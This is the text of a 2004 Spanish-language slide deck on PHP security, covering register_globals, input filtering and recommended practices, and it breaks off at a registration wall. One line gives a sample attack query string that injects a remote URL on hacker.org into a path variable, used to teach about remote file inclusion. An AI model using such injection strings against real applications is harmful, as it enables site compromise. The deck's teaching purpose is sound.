SEGURIDAD INFORMATICA
22 y 27 de Septiembre de 2004
Facultad Regional Concepción del Uruguay
Universidad Tecnológica Nacional
Gabriel Arellano
arellanog@frcu.utn.edu.ar
Seguridad enPHP
– Lineamientos Generales.
– Filtrado de la Entrada.
– Utilización de Librerías.
– Diseño en Tres Capas.
Alejandro de Brito Fontes
debritoa@frcu.utn.edu.ar
Introducción
PHP es unlenguaje que en casi todos los casos estará
soportando aplicaciones accesibles vía Internet.
Por esto se deben tener en cuenta aspectos de seguridad
que normalmente se pasarían por alto en el caso delenguajes de programación tradicionales.
Register Globals
La directiva register_globals permite que las variables
pasadas por el cliente se registren como variables globales
en nuestrasaplicaciones.
Esta directiva está desabilitada por defecto desde la
versión 4.1.0 de PHP.
En principio:
• Considere los usos ilegítimos de su aplicación.
• Filtre la información proveniente delexterior.
• Investigue constantemente.
Esta directiva en sí no es una vulnerabilidad, pero
representa un riesgo de seguridad.
Por lo tanto debería diseñar sus aplicaciones para que
funcionen sinregister_globals activada.
Register Globals
Register Globals
Tomemos este ejemplo:
Recomendaciones:
•Inicializar todas la variables antes de utilizarlas.
Si register_globals estuvieraactivada e hiciera una
consulta como esta:
script.php?path=http%3A%2F%2Fhacker.org%2F%3F
Mi script quedaría:
•Establecer error_reporting a E_ALL durante el
desarrollo.
•Siempre tomar losvalores de los arreglos _POST y
_GET.
•Evitar trabajar con register_globals activado.
Filtrado de la Entrada
Como afirmamos varias veces, el filtrado de la información
que el cliente envía es lapieza fundamental de la seguridad
web. Esto involucra establecer mecanismos mediante los
cuales se pueda determinar la validez de los datos que
están siendo enviados. Un buen diseño debe ayudar a...
Regístrate para leer el documento completo.